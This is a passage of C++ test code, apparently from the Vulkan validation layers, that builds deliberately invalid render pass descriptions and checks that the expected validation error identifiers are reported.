attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; } } } TEST_F(VkLayerTest, RenderPassCreateAttachmentsMisc) { TEST_DESCRIPTION( "Ensure that CreateRenderPass produces the expected validation errors when a subpass's attachments violate the valid usage " "conditions."); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); ASSERT_NO_FATAL_FAILURE(InitState()); std::vector<VkAttachmentDescription> attachments = { // input attachments {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_4_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_GENERAL, VK_IMAGE_LAYOUT_GENERAL}, // color attachments {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_4_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_4_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, // depth attachment {0, VK_FORMAT_D24_UNORM_S8_UINT, VK_SAMPLE_COUNT_4_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL}, // resolve attachment {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, // preserve attachments {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_4_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, }; std::vector<VkAttachmentReference> input = { {0, VK_IMAGE_LAYOUT_GENERAL}, }; std::vector<VkAttachmentReference> color = { {1, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, {2, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, }; VkAttachmentReference depth = {3, VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL}; std::vector<VkAttachmentReference> resolve = { {4, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, {VK_ATTACHMENT_UNUSED, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, }; std::vector<uint32_t> preserve = {5}; VkSubpassDescription subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, (uint32_t)input.size(), input.data(), (uint32_t)color.size(), color.data(), resolve.data(), &depth, (uint32_t)preserve.size(), preserve.data()}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, (uint32_t)attachments.size(), attachments.data(), 1, &subpass, 0, nullptr}; // Test too many color attachments const uint32_t max_color_attachments = m_device->props.limits.maxColorAttachments; const uint32_t too_big_max_attachments = 65536 + 1; // let's say this is too 
much to allocate if (max_color_attachments >= too_big_max_attachments) { printf( "%s VkPhysicalDeviceLimits::maxColorAttachments is too large to practically test against -- skipping part of test.\n", kSkipPrefix); } else { std::vector<VkAttachmentReference> too_many_colors(max_color_attachments + 1, color[0]); VkSubpassDescription test_subpass = subpass; test_subpass.colorAttachmentCount = (uint32_t)too_many_colors.size(); test_subpass.pColorAttachments = too_many_colors.data(); test_subpass.pResolveAttachments = NULL; VkRenderPassCreateInfo test_rpci = rpci; test_rpci.pSubpasses = &test_subpass; TestRenderPassCreate(m_errorMonitor, m_device->device(), &test_rpci, rp2Supported, "VUID-VkSubpassDescription-colorAttachmentCount-00845", "VUID-VkSubpassDescription2-colorAttachmentCount-03063"); } // Test sample count mismatch between color buffers attachments[subpass.pColorAttachments[1].attachment].samples = VK_SAMPLE_COUNT_8_BIT; depth.attachment = VK_ATTACHMENT_UNUSED; // Avoids triggering 01418 TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkSubpassDescription-pColorAttachments-01417", "VUID-VkSubpassDescription2-pColorAttachments-03069"); depth.attachment = 3; attachments[subpass.pColorAttachments[1].attachment].samples = attachments[subpass.pColorAttachments[0].attachment].samples; // Test sample count mismatch between color buffers and depth buffer attachments[subpass.pDepthStencilAttachment->attachment].samples = VK_SAMPLE_COUNT_8_BIT; subpass.colorAttachmentCount = 1; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkSubpassDescription-pDepthStencilAttachment-01418", "VUID-VkSubpassDescription2-pDepthStencilAttachment-03071"); attachments[subpass.pDepthStencilAttachment->attachment].samples = attachments[subpass.pColorAttachments[0].attachment].samples; subpass.colorAttachmentCount = (uint32_t)color.size(); // Test resolve attachment with UNUSED color attachment color[0].attachment = VK_ATTACHMENT_UNUSED; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkSubpassDescription-pResolveAttachments-00847", "VUID-VkSubpassDescription2-pResolveAttachments-03065"); color[0].attachment = 1; // Test resolve from a single-sampled color attachment attachments[subpass.pColorAttachments[0].attachment].samples = VK_SAMPLE_COUNT_1_BIT; subpass.colorAttachmentCount = 1; // avoid mismatch (00337), and avoid double report subpass.pDepthStencilAttachment = nullptr; // avoid mismatch (01418) TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkSubpassDescription-pResolveAttachments-00848", "VUID-VkSubpassDescription2-pResolveAttachments-03066"); attachments[subpass.pColorAttachments[0].attachment].samples = VK_SAMPLE_COUNT_4_BIT; subpass.colorAttachmentCount = (uint32_t)color.size(); subpass.pDepthStencilAttachment = &depth; // Test resolve to a multi-sampled resolve attachment attachments[subpass.pResolveAttachments[0].attachment].samples = VK_SAMPLE_COUNT_4_BIT; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkSubpassDescription-pResolveAttachments-00849", "VUID-VkSubpassDescription2-pResolveAttachments-03067"); attachments[subpass.pResolveAttachments[0].attachment].samples = VK_SAMPLE_COUNT_1_BIT; // Test with color/resolve format mismatch attachments[subpass.pColorAttachments[0].attachment].format = VK_FORMAT_R8G8B8A8_SRGB; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, 
"VUID-VkSubpassDescription-pResolveAttachments-00850", "VUID-VkSubpassDescription2-pResolveAttachments-03068"); attachments[subpass.pColorAttachments[0].attachment].format = attachments[subpass.pResolveAttachments[0].attachment].format; // Test for UNUSED preserve attachments preserve[0] = VK_ATTACHMENT_UNUSED; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkSubpassDescription-attachment-00853", "VUID-VkSubpassDescription2-attachment-03073"); preserve[0] = 5; // Test for preserve attachments used elsewhere in the subpass color[0].attachment = preserve[0]; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkSubpassDescription-pPreserveAttachments-00854", "VUID-VkSubpassDescription2-pPreserveAttachments-03074"); color[0].attachment = 1; input[0].attachment = 0; input[0].layout = VK_IMAGE_LAYOUT_GENERAL; // Test for attachment used first as input with loadOp=CLEAR { std::vector<VkSubpassDescription> subpasses = {subpass, subpass, subpass}; subpasses[0].inputAttachmentCount = 0; subpasses[1].inputAttachmentCount = 0; attachments[input[0].attachment].loadOp = VK_ATTACHMENT_LOAD_OP_CLEAR; VkRenderPassCreateInfo rpci_multipass = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, (uint32_t)attachments.size(), attachments.data(), (uint32_t)subpasses.size(), subpasses.data(), 0, nullptr}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci_multipass, rp2Supported, "VUID-VkSubpassDescription-loadOp-00846", "VUID-VkSubpassDescription2-loadOp-03064"); attachments[input[0].attachment].loadOp = VK_ATTACHMENT_LOAD_OP_DONT_CARE; } } TEST_F(VkLayerTest, RenderPassCreateAttachmentReferenceInvalidLayout) { TEST_DESCRIPTION("Attachment reference uses PREINITIALIZED or UNDEFINED layouts"); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); if (DeviceExtensionSupported(gpu(), nullptr, VK_KHR_SEPARATE_DEPTH_STENCIL_LAYOUTS_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_SEPARATE_DEPTH_STENCIL_LAYOUTS_EXTENSION_NAME); } PFN_vkGetPhysicalDeviceFeatures2KHR vkGetPhysicalDeviceFeatures2KHR = (PFN_vkGetPhysicalDeviceFeatures2KHR)vk::GetInstanceProcAddr(instance(), "vkGetPhysicalDeviceFeatures2KHR"); auto separate_depth_stencil_layouts_features = lvl_init_struct<VkPhysicalDeviceSeparateDepthStencilLayoutsFeaturesKHR>(); auto features2 = lvl_init_struct<VkPhysicalDeviceFeatures2KHR>(&separate_depth_stencil_layouts_features); if (vkGetPhysicalDeviceFeatures2KHR) { vkGetPhysicalDeviceFeatures2KHR(gpu(), &features2); } else { separate_depth_stencil_layouts_features.separateDepthStencilLayouts = VK_FALSE; } ASSERT_NO_FATAL_FAILURE(InitState(nullptr, (vkGetPhysicalDeviceFeatures2KHR) ? 
&features2 : nullptr)); VkAttachmentDescription attach[] = { {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_UNDEFINED, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, }; VkAttachmentReference refs[] = { {0, VK_IMAGE_LAYOUT_UNDEFINED}, }; VkSubpassDescription subpasses[] = { {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 1, refs, nullptr, nullptr, 0, nullptr}, }; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 1, attach, 1, subpasses, 0, nullptr}; // Use UNDEFINED layout TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentReference-layout-00857", "VUID-VkAttachmentReference2-layout-03077"); // Use PREINITIALIZED layout refs[0].layout = VK_IMAGE_LAYOUT_PREINITIALIZED; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentReference-layout-00857", "VUID-VkAttachmentReference2-layout-03077"); if (rp2Supported) { safe_VkRenderPassCreateInfo2 rpci2; ConvertVkRenderPassCreateInfoToV2KHR(rpci, &rpci2); if (separate_depth_stencil_layouts_features.separateDepthStencilLayouts) { rpci2.pSubpasses[0].pColorAttachments[0].aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-attachment-03314"); rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-attachment-03314"); rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-attachment-03314"); rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-attachment-03314"); rpci2.pSubpasses[0].pColorAttachments[0].aspectMask = VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT; rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-attachment-03315"); rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-attachment-03315"); rpci2.pSubpasses[0].pColorAttachments[0].aspectMask = VK_IMAGE_ASPECT_DEPTH_BIT; rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-attachment-03315"); rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-attachment-03315"); rpci2.pSubpasses[0].pColorAttachments[0].aspectMask = VK_IMAGE_ASPECT_STENCIL_BIT; rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), 
"VUID-VkAttachmentReference2-attachment-03317"); rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-attachment-03317"); auto attachment_reference_stencil_layout = lvl_init_struct<VkAttachmentReferenceStencilLayoutKHR>(); rpci2.pSubpasses[0].pColorAttachments[0].pNext = &attachment_reference_stencil_layout; VkImageLayout forbidden_layouts[] = {VK_IMAGE_LAYOUT_PREINITIALIZED, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR, VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR, VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL, VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL, VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_PRESENT_SRC_KHR}; rpci2.pSubpasses[0].pColorAttachments[0].aspectMask = VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT; rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; for (size_t i = 0; i < (sizeof(forbidden_layouts) / sizeof(forbidden_layouts[0])); ++i) { attachment_reference_stencil_layout.stencilLayout = forbidden_layouts[i]; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReferenceStencilLayout-stencilLayout-03318"); } rpci2.pSubpasses[0].pColorAttachments[0].pNext = nullptr; } else { rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-separateDepthStencilLayouts-03313"); rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-separateDepthStencilLayouts-03313"); rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-separateDepthStencilLayouts-03313"); rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-separateDepthStencilLayouts-03313"); } } } TEST_F(VkLayerTest, RenderPassCreateOverlappingCorrelationMasks) { TEST_DESCRIPTION("Create a subpass with overlapping correlation masks"); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); if (!rp2Supported) { if (DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MULTIVIEW_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_MULTIVIEW_EXTENSION_NAME); } else { printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_KHR_MULTIVIEW_EXTENSION_NAME); return; } } ASSERT_NO_FATAL_FAILURE(InitState()); VkSubpassDescription subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, nullptr, 0, nullptr}; uint32_t viewMasks[] = {0x3u}; uint32_t correlationMasks[] = {0x1u, 0x3u}; VkRenderPassMultiviewCreateInfo rpmvci = { 
VK_STRUCTURE_TYPE_RENDER_PASS_MULTIVIEW_CREATE_INFO, nullptr, 1, viewMasks, 0, nullptr, 2, correlationMasks}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, &rpmvci, 0, 0, nullptr, 1, &subpass, 0, nullptr}; // Correlation masks must not overlap TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkRenderPassMultiviewCreateInfo-pCorrelationMasks-00841", "VUID-VkRenderPassCreateInfo2-pCorrelatedViewMasks-03056"); // Check for more specific "don't set any correlation masks when multiview is not enabled" if (rp2Supported) { viewMasks[0] = 0; correlationMasks[0] = 0; correlationMasks[1] = 0; safe_VkRenderPassCreateInfo2 safe_rpci2; ConvertVkRenderPassCreateInfoToV2KHR(rpci, &safe_rpci2); TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), safe_rpci2.ptr(), "VUID-VkRenderPassCreateInfo2-viewMask-03057"); } } TEST_F(VkLayerTest, RenderPassCreateInvalidViewMasks) { TEST_DESCRIPTION("Create a subpass with the wrong number of view masks, or inconsistent setting of view masks"); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); if (!rp2Supported) { if (DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MULTIVIEW_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_MULTIVIEW_EXTENSION_NAME); } else { printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_KHR_MULTIVIEW_EXTENSION_NAME); return; } } ASSERT_NO_FATAL_FAILURE(InitState()); VkSubpassDescription subpasses[] = { {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, nullptr, 0, nullptr}, {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, nullptr, 0, nullptr}, }; uint32_t viewMasks[] = {0x3u, 0u}; VkRenderPassMultiviewCreateInfo rpmvci = { VK_STRUCTURE_TYPE_RENDER_PASS_MULTIVIEW_CREATE_INFO, nullptr, 1, viewMasks, 0, nullptr, 0, nullptr}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, &rpmvci, 0, 0, nullptr, 2, subpasses, 0, nullptr}; // Not enough view masks TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkRenderPassCreateInfo-pNext-01928", "VUID-VkRenderPassCreateInfo2-viewMask-03058"); } TEST_F(VkLayerTest, RenderPassCreateInvalidInputAttachmentReferences) { TEST_DESCRIPTION("Create a subpass with the meta data aspect mask set for an input attachment"); ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); if (DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MAINTENANCE2_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_MAINTENANCE2_EXTENSION_NAME); } else { printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_KHR_MAINTENANCE2_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitState()); VkAttachmentDescription attach = {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_UNDEFINED, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL}; VkAttachmentReference ref = {0, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL}; VkSubpassDescription subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 1, &ref, 0, nullptr, nullptr, nullptr, 0, nullptr}; VkInputAttachmentAspectReference iaar 
= {0, 0, VK_IMAGE_ASPECT_METADATA_BIT}; VkRenderPassInputAttachmentAspectCreateInfo rpiaaci = {VK_STRUCTURE_TYPE_RENDER_PASS_INPUT_ATTACHMENT_ASPECT_CREATE_INFO, nullptr, 1, &iaar}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, &rpiaaci, 0, 1, &attach, 1, &subpass, 0, nullptr}; // Invalid meta data aspect m_errorMonitor->SetDesiredFailureMsg( VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkRenderPassCreateInfo-pNext-01963"); // Cannot/should not avoid getting this one too TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, false, "VUID-VkInputAttachmentAspectReference-aspectMask-01964", nullptr); // Aspect not present iaar.aspectMask = VK_IMAGE_ASPECT_DEPTH_BIT; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, false, "VUID-VkRenderPassCreateInfo-pNext-01963", nullptr); // Invalid subpass index iaar.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; iaar.subpass = 1; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, false, "VUID-VkRenderPassCreateInfo-pNext-01926", nullptr); iaar.subpass = 0; // Invalid input attachment index iaar.inputAttachmentIndex = 1; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, false, "VUID-VkRenderPassCreateInfo-pNext-01927", nullptr); } TEST_F(VkLayerTest, RenderPassCreateInvalidFragmentDensityMapReferences) { TEST_DESCRIPTION("Create a subpass with the wrong attachment information for a fragment density map "); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } else { printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_EXT_FRAGMENT_DENSITY_MAP_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); if (DeviceExtensionSupported(gpu(), nullptr, VK_EXT_FRAGMENT_DENSITY_MAP_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_EXT_FRAGMENT_DENSITY_MAP_EXTENSION_NAME); } else { printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_EXT_FRAGMENT_DENSITY_MAP_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitState()); VkAttachmentDescription attach = {0, VK_FORMAT_R8G8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_LOAD, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_UNDEFINED, VK_IMAGE_LAYOUT_FRAGMENT_DENSITY_MAP_OPTIMAL_EXT}; // Set 1 instead of 0 VkAttachmentReference ref = {1, VK_IMAGE_LAYOUT_FRAGMENT_DENSITY_MAP_OPTIMAL_EXT}; VkSubpassDescription subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 1, &ref, 0, nullptr, nullptr, nullptr, 0, nullptr}; VkRenderPassFragmentDensityMapCreateInfoEXT rpfdmi = {VK_STRUCTURE_TYPE_RENDER_PASS_FRAGMENT_DENSITY_MAP_CREATE_INFO_EXT, nullptr, ref}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, &rpfdmi, 0, 1, &attach, 1, &subpass, 0, nullptr}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, false, "VUID-VkRenderPassFragmentDensityMapCreateInfoEXT-fragmentDensityMapAttachment-02547", nullptr); // Set wrong VkImageLayout ref = {0, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}; subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 1, &ref, 0, nullptr, nullptr, nullptr, 0, nullptr}; rpfdmi = {VK_STRUCTURE_TYPE_RENDER_PASS_FRAGMENT_DENSITY_MAP_CREATE_INFO_EXT, nullptr, ref}; rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, &rpfdmi, 0, 1, &attach, 1, &subpass, 0, nullptr}; TestRenderPassCreate(m_errorMonitor, 
